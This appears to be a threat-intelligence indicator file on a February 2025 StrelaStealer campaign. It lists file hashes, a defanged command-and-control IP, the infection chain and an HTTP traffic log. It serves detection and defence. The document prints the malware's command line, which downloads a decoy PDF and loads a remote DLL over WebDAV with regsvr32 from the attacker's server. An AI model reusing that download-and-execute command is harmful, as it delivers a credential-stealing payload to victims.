-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy path2025-02-10-IOCs-for-StrelaStealer-activity.txt
108 lines (82 loc) · 6.35 KB
/
2025-02-10-IOCs-for-StrelaStealer-activity.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
2025-02-10 (MONDAY): RECENT STRELASTEALER INFECTION CHAIN INVOLVES DECOY PDF FILES
AUTHOR:
- Vishwa Thothathri
REFERENCES:
- https://www.linkedin.com/posts/unit42_strelastealer-malspam-webdav-activity-7295144078428491776-vyqY/
- https://x.com/Unit42_Intel/status/1889378454287581678
NOTES:
- Recent StrelaStealer activity continues to use WebDAV servers to host malware.
- Since the end of January 2025, we have begun seeing decoy PDF files used during the infection process.
- The WebDAV and C2 server at 193.143.1[.]205 is still actively hosting the decoy PDF and StrelaStealer malware as of Monday 2025-02-10.
- The decoy PDF is not malicious, but it has a blurred image, and it acts as a misdirect for potential victims.
- The .js files only execute if the victim's Windows host uses the following languages and locales:
- German (Austria)
- German (Germany)
- German (Liechtenstein)
- German (Luxembourg)
- German (Switzerland)
RECENT INFECTION CHAIN:
- email --> attached zip archive --> extracted JavaScript (.js) file --> wscript.exe runs .js file if double-clicked:
-- Script generates PowerShell command to retrieve and open a decoy PDF document.
-- Script also runs a command line in the background to execute StelaStealer DLL hosted on WebDAV server.
BACKGROUND
- First identified in 2022, StealaStealer is an information stealer that focuses on email clients [1].
- We've reported about StrelaStealer before, including an early 2024 campaign targeting the EU and the US [2].
- StrelaStealer continues to be distributed through email attachments of zip archives containing JS files.
- However, by later in 2024, the infection chain has used StelaStealer DLLs hosted on WebDAV servers [3].
[1] https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc
[2] https://unit42.paloaltonetworks.com/strelastealer-campaign/
[3] https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/
10 EXAMPLES OF ZIP ARCHIVES (READ: 256 HASH - CONTENT MODIFIED DATE):
- 0237c0247632a2ea8d80bb1a3398f1ba9b8f7704af70113e8fa0bbe688550ea1 - 2025-01-31
- 0d11f84e614c5394218abcfde06dc0ca4befb4d4527ec38a009e9bd78a0a403c - 2025-02-02
- 3ea9961f6b11e3fd9f09e76819ab7083f1ad924d5fbd543b466c467880e943d4 - 2025-02-01
- 3fa21cc2a8b3548d82f432e4498b867f774083a879c91056afa0d0b1116d8af3 - 2025-02-03
- 4adf4847c92046a65f51a2f0886f6c97a27e4fd73e0bf3a6d7778b500f40c4a7 - 2025-01-31
- 4f512c879ae57917208596543e039012e13588437e106c1986c25428ae6aa58a - 2025-02-02
- 526f99634031b5220df204148aaeaf4a105c927a9623eff4e0e6eab2fec470e6 - 2025-02-03
- 56ddf2bcd35791d353cccb64f2b03b4e30d62fbf64408a53fb081acb229e7bb1 - 2025-02-01
- 57a98c713f1b54cf2a15f03abd827361ba03f94ce04668558f5a3987a1f47dc6 - 2025-01-31
- 7e4939b5a3f45a6deca1e52fb1570a41a64eab4100819be1ce277ff05869527d - 2025-01-31
10 EXAMPLES OF EXTRACTED JS FILES (READ: 256 HASH - FILE NAME):
- 023fe721b61eb902dde8e89cf1d2d9a9a90a9e3016c36836f3f96eb0846e0e4f - 69316292209201925.js
- 18f2f23775a128b26139cf373373890d7165049600af5f3da6776a04c991f82f - 3930136912895510724.js
- 2e76869289964a9025f8dc20c9f4ce0c341a7b0305c3906e717c812af4efff88 - 6296171943098930539.js
- 36d1eeb02cd95376360a2bb64fbd531f57a5ad1e496f1a28f9d6f8d1b30150da - 28718730539521232.js
- 3d90244755ddc949ba4a46ba01dc8157dbe0ffa96aab27a43fca4e2f2f7960ce - 28753186572874527511.js
- 9f418f7c66d036b02047f0e99a86647e406f97457ba5ff05aa8c6774e2156166 - 200132092063627487.js
- b83bc3ea84a1dfa72e46905e8fe63d8102e67866be40d0f74aa25cba6467765e - 135081567013634423.js
- b85724ef6d750864422bae530864a6a77c7616d2dc291da74c1fc41e23ece6c3 - 22768300603044429766.js
- bd7d9850ab56ea616b6762e736adbfc12809cdfd18525b0eb79712be7317200c - 673710946634315968.js
- cf7ebeeab3c143444a761b8aff25ee9cf3bb498927004e27cfe33fb7eee75c93 - 289827161103546153.js
EXAMPLE OF SCRIPT GENERATED BY A .JS FILE TO LOAD/OPEN DECOY PDF DOCUMENT AND RUN STRELASTEALER:
- cmd /c powershell.exe -Command
"Invoke-WebRequest -OutFile %temp%\\invoice.pdf hxxp[:]//193.143.1[.]205/invoice.php" &&
start %temp%\\invoice.pdf &&
cmd /c net use \\\\193.143.1[.]205@8888\\davwwwroot\\ &&
cmd /c regsvr32 /s \\\\193.143.1[.]205@8888\\davwwwroot\\281681957614368.dll
- Note: The DLL file name is different for each .js sample.
TWO EXAMPLES OF SHA256 HASHES FOR DECOY PDF DOCUMENTS:
- 915c9d78cf65c4be89eda22e5f03d44d6a593bc4be02fa816871d8ee398ca8fa
- fc3518d746cdb3738da976551795b9727619f41f89ac0641533126e2f69b969a
THREE EXAMPLES OF STRELASTEALER DLL FILES (READ: SHA256 HASH - FIRST SEEN DATE):
- 0e8e0a57a3cc02c8666378463e1bde1697c3e6bb14e5b773f644e06ea05ab41c - 2025-01-27
- cc773750eff260dc5396f878e3a61f5a79689e0078e8b679b3152f7af027a429 - 2025-02-10
- f3677f29dee7338da89321564757caa15ce0c50f85540977b7470bf3a6ca0d2c - 2025-01-23
EXAMPLE OF INFECTION TRAFFIC GENERATED ON 2025-02-10:
- Note: We used the .js file with a SHA256 hash of 2e76869289964a9025f8dc20c9f4ce0c341a7b0305c3906e717c812af4efff88 from 2025-01-31 to generate this traffic.
Date/Time IP address port Host HTTP request
----------------------- --------------- ---- -------------------- ---------------------------------------
2025-02-10 23:49:38 UTC 193.143.1[.]205 80 193.143.1[.]205 GET /invoice.php HTTP/1.1
2025-02-10 23:49:40 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 OPTIONS / HTTP/1.1
2025-02-10 23:49:43 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 OPTIONS / HTTP/1.1
2025-02-10 23:49:44 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPFIND / HTTP/1.1
2025-02-10 23:49:44 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPFIND / HTTP/1.1
2025-02-10 23:49:45 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPFIND /281681957614368.dll HTTP/1.1
2025-02-10 23:49:46 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 GET /281681957614368.dll HTTP/1.1
2025-02-10 23:49:47 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPFIND /281681957614368.dll HTTP/1.1
2025-02-10 23:50:04 UTC 193.143.1[.]205 80 193.143.1[.]205 POST /up.php HTTP/1.1
2025-02-10 23:50:14 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPPATCH /281681957614368.dll HTTP/1.1
2025-02-10 23:50:15 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPPATCH /281681957614368.dll HTTP/1.1
2025-02-10 23:50:20 UTC 193.143.1[.]205 80 193.143.1[.]205 POST /up.php HTTP/1.1
2025-02-10 23:50:21 UTC 193.143.1[.]205 80 193.143.1[.]205 POST /up.php HTTP/1.1